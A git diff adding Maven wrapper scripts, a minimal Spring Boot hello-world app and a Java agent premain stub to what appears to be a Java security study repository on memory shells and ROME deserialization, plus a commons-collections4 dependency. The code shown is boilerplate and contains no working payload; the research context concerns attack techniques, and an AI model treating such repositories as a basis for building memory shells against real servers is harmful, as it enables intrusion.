+ if [ -f /usr/local/etc/mavenrc ] ; then
+ . /usr/local/etc/mavenrc
+ fi
+
+ if [ -f /etc/mavenrc ] ; then
+ . /etc/mavenrc
+ fi
+
+ if [ -f "$HOME/.mavenrc" ] ; then
+ . "$HOME/.mavenrc"
+ fi
+
+fi
+
+# OS specific support. $var _must_ be set to either true or false.
+cygwin=false;
+darwin=false;
+mingw=false
+case "`uname`" in
+ CYGWIN*) cygwin=true ;;
+ MINGW*) mingw=true;;
+ Darwin*) darwin=true
+ # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
+ # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
+ if [ -z "$JAVA_HOME" ]; then
+ if [ -x "/usr/libexec/java_home" ]; then
+ export JAVA_HOME="`/usr/libexec/java_home`"
+ else
+ export JAVA_HOME="/Library/Java/Home"
+ fi
+ fi
+ ;;
+esac
+
+if [ -z "$JAVA_HOME" ] ; then
+ if [ -r /etc/gentoo-release ] ; then
+ JAVA_HOME=`java-config --jre-home`
+ fi
+fi
+
+if [ -z "$M2_HOME" ] ; then
+ ## resolve links - 0ドル may be a link to maven's home
+ PRG="0ドル"
+
+ # need this for relative symlinks
+ while [ -h "$PRG" ] ; do
+ ls=`ls -ld "$PRG"`
+ link=`expr "$ls" : '.*-> \(.*\)$'`
+ if expr "$link" : '/.*'> /dev/null; then
+ PRG="$link"
+ else
+ PRG="`dirname "$PRG"`/$link"
+ fi
+ done
+
+ saveddir=`pwd`
+
+ M2_HOME=`dirname "$PRG"`/..
+
+ # make it fully qualified
+ M2_HOME=`cd "$M2_HOME" && pwd`
+
+ cd "$saveddir"
+ # echo Using m2 at $M2_HOME
+fi
+
+# For Cygwin, ensure paths are in UNIX format before anything is touched
+if $cygwin ; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME=`cygpath --unix "$M2_HOME"`
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
+ [ -n "$CLASSPATH" ] &&
+ CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
+fi
+
+# For Mingw, ensure paths are in UNIX format before anything is touched
+if $mingw ; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME="`(cd "$M2_HOME"; pwd)`"
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
+fi
+
+if [ -z "$JAVA_HOME" ]; then
+ javaExecutable="`which javac`"
+ if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
+ # readlink(1) is not available as standard on Solaris 10.
+ readLink=`which readlink`
+ if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
+ if $darwin ; then
+ javaHome="`dirname \"$javaExecutable\"`"
+ javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
+ else
+ javaExecutable="`readlink -f \"$javaExecutable\"`"
+ fi
+ javaHome="`dirname \"$javaExecutable\"`"
+ javaHome=`expr "$javaHome" : '\(.*\)/bin'`
+ JAVA_HOME="$javaHome"
+ export JAVA_HOME
+ fi
+ fi
+fi
+
+if [ -z "$JAVACMD" ] ; then
+ if [ -n "$JAVA_HOME" ] ; then
+ if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+ # IBM's JDK on AIX uses strange locations for the executables
+ JAVACMD="$JAVA_HOME/jre/sh/java"
+ else
+ JAVACMD="$JAVA_HOME/bin/java"
+ fi
+ else
+ JAVACMD="`\\unset -f command; \\command -v java`"
+ fi
+fi
+
+if [ ! -x "$JAVACMD" ] ; then
+ echo "Error: JAVA_HOME is not defined correctly.">&2
+ echo " We cannot execute $JAVACMD">&2
+ exit 1
+fi
+
+if [ -z "$JAVA_HOME" ] ; then
+ echo "Warning: JAVA_HOME environment variable is not set."
+fi
+
+CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
+
+# traverses directory structure from process work directory to filesystem root
+# first directory with .mvn subdirectory is considered project base directory
+find_maven_basedir() {
+
+ if [ -z "1ドル" ]
+ then
+ echo "Path not specified to find_maven_basedir"
+ return 1
+ fi
+
+ basedir="1ドル"
+ wdir="1ドル"
+ while [ "$wdir" != '/' ] ; do
+ if [ -d "$wdir"/.mvn ] ; then
+ basedir=$wdir
+ break
+ fi
+ # workaround for JBEAP-8937 (on Solaris 10/Sparc)
+ if [ -d "${wdir}" ]; then
+ wdir=`cd "$wdir/.."; pwd`
+ fi
+ # end of workaround
+ done
+ echo "${basedir}"
+}
+
+# concatenates all lines of a file
+concat_lines() {
+ if [ -f "1ドル" ]; then
+ echo "$(tr -s '\n' ' ' < "1ドル")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + if [ -n "$MVNW_REPOURL" ]; then + jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + else + jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + fi + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + if $cygwin; then + wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` + fi + + if command -v wget> /dev/null; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Found wget ... using wget"
+ fi
+ if [ -z "$MVNW_USERNAME" ] &#124;&#124; [ -z "$MVNW_PASSWORD" ]; then
+ wget "$jarUrl" -O "$wrapperJarPath" &#124;&#124; rm -f "$wrapperJarPath"
+ else
+ wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" &#124;&#124; rm -f "$wrapperJarPath"
+ fi
+ elif command -v curl> /dev/null; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Found curl ... using curl"
+ fi
+ if [ -z "$MVNW_USERNAME" ] &#124;&#124; [ -z "$MVNW_PASSWORD" ]; then
+ curl -o "$wrapperJarPath" "$jarUrl" -f
+ else
+ curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
+ fi
+
+ else
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Falling back to using Java to download"
+ fi
+ javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
+ # For Cygwin, switch paths to Windows format before running javac
+ if $cygwin; then
+ javaClass=`cygpath --path --windows "$javaClass"`
+ fi
+ if [ -e "$javaClass" ]; then
+ if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo " - Compiling MavenWrapperDownloader.java ..."
+ fi
+ # Compiling the Java class
+ ("$JAVA_HOME/bin/javac" "$javaClass")
+ fi
+ if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+ # Running the downloader
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo " - Running MavenWrapperDownloader.java ..."
+ fi
+ ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
+ fi
+ fi
+ fi
+fi
+##########################################################################################
+# End of extension
+##########################################################################################
+
+export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
+if [ "$MVNW_VERBOSE" = true ]; then
+ echo $MAVEN_PROJECTBASEDIR
+fi
+MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
+
+# For Cygwin, switch paths to Windows format before running java
+if $cygwin; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME=`cygpath --path --windows "$M2_HOME"`
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
+ [ -n "$CLASSPATH" ] &&
+ CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
+ [ -n "$MAVEN_PROJECTBASEDIR" ] &&
+ MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
+fi
+
+# Provide a "standardized" way to retrieve the CLI args that will
+# work with both Windows and non-Windows executions.
+MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
+export MAVEN_CMD_LINE_ARGS
+
+WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+exec "$JAVACMD" \
+ $MAVEN_OPTS \
+ $MAVEN_DEBUG_OPTS \
+ -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
+ "-Dmaven.home=${M2_HOME}" \
+ "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
+ ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw.cmd b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw.cmd
new file mode 100644
index 00000000..1d8ab018
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/mvnw.cmd
@@ -0,0 +1,188 @@
+@REM ----------------------------------------------------------------------------
+@REM Licensed to the Apache Software Foundation (ASF) under one
+@REM or more contributor license agreements. See the NOTICE file
+@REM distributed with this work for additional information
+@REM regarding copyright ownership. The ASF licenses this file
+@REM to you under the Apache License, Version 2.0 (the
+@REM "License"); you may not use this file except in compliance
+@REM with the License. You may obtain a copy of the License at
+@REM
+@REM https://www.apache.org/licenses/LICENSE-2.0
+@REM
+@REM Unless required by applicable law or agreed to in writing,
+@REM software distributed under the License is distributed on an
+@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+@REM KIND, either express or implied. See the License for the
+@REM specific language governing permissions and limitations
+@REM under the License.
+@REM ----------------------------------------------------------------------------
+
+@REM ----------------------------------------------------------------------------
+@REM Maven Start Up Batch script
+@REM
+@REM Required ENV vars:
+@REM JAVA_HOME - location of a JDK home dir
+@REM
+@REM Optional ENV vars
+@REM M2_HOME - location of maven2's installed home dir
+@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
+@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
+@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
+@REM e.g. to debug Maven itself, use
+@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+@REM ----------------------------------------------------------------------------
+
+@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
+@echo off
+@REM set title of command window
+title %0
+@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
+@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
+
+@REM set %HOME% to equivalent of $HOME
+if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
+
+@REM Execute a user defined script before this one
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
+@REM check for pre script, once with legacy .bat ending and once with .cmd ending
+if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %*
+if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %*
+:skipRcPre
+
+@setlocal
+
+set ERROR_CODE=0
+
+@REM To isolate internal variables from possible post scripts, we use another setlocal
+@setlocal
+
+@REM ==== START VALIDATION ====
+if not "%JAVA_HOME%" == "" goto OkJHome
+
+echo.
+echo Error: JAVA_HOME not found in your environment.>&2
+echo Please set the JAVA_HOME variable in your environment to match the>&2
+echo location of your Java installation.>&2
+echo.
+goto error
+
+:OkJHome
+if exist "%JAVA_HOME%\bin\java.exe" goto init
+
+echo.
+echo Error: JAVA_HOME is set to an invalid directory.>&2
+echo JAVA_HOME = "%JAVA_HOME%">&2
+echo Please set the JAVA_HOME variable in your environment to match the>&2
+echo location of your Java installation.>&2
+echo.
+goto error
+
+@REM ==== END VALIDATION ====
+
+:init
+
+@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
+@REM Fallback to current working directory if not found.
+
+set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
+IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
+
+set EXEC_DIR=%CD%
+set WDIR=%EXEC_DIR%
+:findBaseDir
+IF EXIST "%WDIR%"\.mvn goto baseDirFound
+cd ..
+IF "%WDIR%"=="%CD%" goto baseDirNotFound
+set WDIR=%CD%
+goto findBaseDir
+
+:baseDirFound
+set MAVEN_PROJECTBASEDIR=%WDIR%
+cd "%EXEC_DIR%"
+goto endDetectBaseDir
+
+:baseDirNotFound
+set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
+cd "%EXEC_DIR%"
+
+:endDetectBaseDir
+
+IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
+
+@setlocal EnableExtensions EnableDelayedExpansion
+for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
+@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
+
+:endReadAdditionalConfig
+
+SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
+set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
+set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+
+FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
+ IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
+)
+
+@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
+if exist %WRAPPER_JAR% (
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Found %WRAPPER_JAR%
+ )
+) else (
+ if not "%MVNW_REPOURL%" == "" (
+ SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
+ )
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Couldn't find %WRAPPER_JAR%, downloading it ...
+ echo Downloading from: %DOWNLOAD_URL%
+ )
+
+ powershell -Command "&{"^
+		"$webclient = new-object System.Net.WebClient;"^
+		"if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
+		"$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
+		"}"^
+		"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
+		"}"
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Finished downloading %WRAPPER_JAR%
+ )
+)
+@REM End of extension
+
+@REM Provide a "standardized" way to retrieve the CLI args that will
+@REM work with both Windows and non-Windows executions.
+set MAVEN_CMD_LINE_ARGS=%*
+
+%MAVEN_JAVA_EXE% ^
+ %JVM_CONFIG_MAVEN_PROPS% ^
+ %MAVEN_OPTS% ^
+ %MAVEN_DEBUG_OPTS% ^
+ -classpath %WRAPPER_JAR% ^
+ "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^
+ %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
+if ERRORLEVEL 1 goto error
+goto end
+
+:error
+set ERROR_CODE=1
+
+:end
+@endlocal & set ERROR_CODE=%ERROR_CODE%
+
+if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost
+@REM check for post script, once with legacy .bat ending and once with .cmd ending
+if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat"
+if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd"
+:skipRcPost
+
+@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
+if "%MAVEN_BATCH_PAUSE%"=="on" pause
+
+if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE%
+
+cmd /C exit /B %ERROR_CODE%
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/pom.xml
new file mode 100644
index 00000000..aa371083
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/pom.xml
@@ -0,0 +1,41 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-parent</artifactid>
+ <version>2.6.7</version>
+ <relativepath/> 
+ </parent>
+ <groupid>com.example</groupid>
+ <artifactid>Java_Agent_SpringBoot</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>Java_Agent_SpringBoot</name>
+ <description>Java_Agent_SpringBoot</description>
+ <properties>
+ <java.version>1.8</java.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-web</artifactid>
+ </dependency>
+
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/Hello_Controller.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/Hello_Controller.java
new file mode 100644
index 00000000..4ed3b6ea
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/Hello_Controller.java
@@ -0,0 +1,15 @@
+package com.example.java_agent_springboot;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+@Controller
+public class Hello_Controller {
+
+ @ResponseBody
+ @RequestMapping("/hello")
+ public String Hello(){
+ return "Hello World!";
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/JavaAgentSpringBootApplication.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/JavaAgentSpringBootApplication.java
new file mode 100644
index 00000000..094f491e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/java/com/example/java_agent_springboot/JavaAgentSpringBootApplication.java
@@ -0,0 +1,13 @@
+package com.example.java_agent_springboot;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class JavaAgentSpringBootApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(JavaAgentSpringBootApplication.class, args);
+ }
+
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/resources/application.properties b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/resources/application.properties
new file mode 100644
index 00000000..4d360de1
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/main/resources/application.properties
@@ -0,0 +1 @@
+server.port=8081
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/test/java/com/example/java_agent_springboot/JavaAgentSpringBootApplicationTests.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/test/java/com/example/java_agent_springboot/JavaAgentSpringBootApplicationTests.java
new file mode 100644
index 00000000..c32bd04b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/Java_Agent_SpringBoot/src/test/java/com/example/java_agent_springboot/JavaAgentSpringBootApplicationTests.java
@@ -0,0 +1,13 @@
+package com.example.java_agent_springboot;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class JavaAgentSpringBootApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/.gitignore b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/pom.xml
new file mode 100644
index 00000000..693c62ae
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/pom.xml
@@ -0,0 +1,9 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>premain</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <name>Archetype - premain</name>
+ <url>http://maven.apache.org</url>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Hello.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Hello.java
new file mode 100644
index 00000000..0ead107a
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Hello.java
@@ -0,0 +1,5 @@
+public class Hello {
+ public static void main(String[] args) {
+ System.out.println("Hello World!");
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Java_Agent_premain.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Java_Agent_premain.java
new file mode 100644
index 00000000..ab0220b7
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/java/Java_Agent_premain.java
@@ -0,0 +1,9 @@
+import java.lang.instrument.Instrumentation;
+
+public class Java_Agent_premain {
+ public static void premain(String args, Instrumentation inst) {
+ for (int i=0 ; i<10 ; i++){ + System.out.println("调用了premain-Agent!"); + } + } +} \ No newline at end of file diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/agent.MF b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/agent.MF new file mode 100644 index 00000000..ff1b29a8 --- /dev/null +++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/agent.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Premain-Class: Java_Agent_premain + diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/archetype.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/archetype.xml new file mode 100644 index 00000000..cb5ee8ac --- /dev/null +++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/archetype.xml @@ -0,0 +1,9 @@ +<archetype>
+ <id>premain</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/hello.mf b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/hello.mf
new file mode 100644
index 00000000..2049492d
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/META-INF/maven/hello.mf
@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Main-Class: Hello
+
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/pom.xml b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/pom.xml
new file mode 100644
index 00000000..2e878ffc
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/pom.xml
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$premain</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/main/java/App.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/main/java/App.java
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/MemoryShell/Java-Agent-Memshell/premain/src/main/resources/archetype-resources/src/test/java/AppTest.java
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/ROME/BasicRome/pom.xml b/JavaSecurity/ROME/BasicRome/pom.xml
index 659f7a2c..99cfb73e 100644
--- a/JavaSecurity/ROME/BasicRome/pom.xml
+++ b/JavaSecurity/ROME/BasicRome/pom.xml
@@ -24,6 +24,12 @@
 <artifactid>jboss-classpool</artifactid>
 <version>1.0.0.GA</version>
 </dependency>
+ <dependency>
+ <groupid>org.apache.commons</groupid>
+ <artifactid>commons-collections4</artifactid>
+ <version>4.4</version>
+ </dependency>
+
 </dependencies>
 
 <properties>
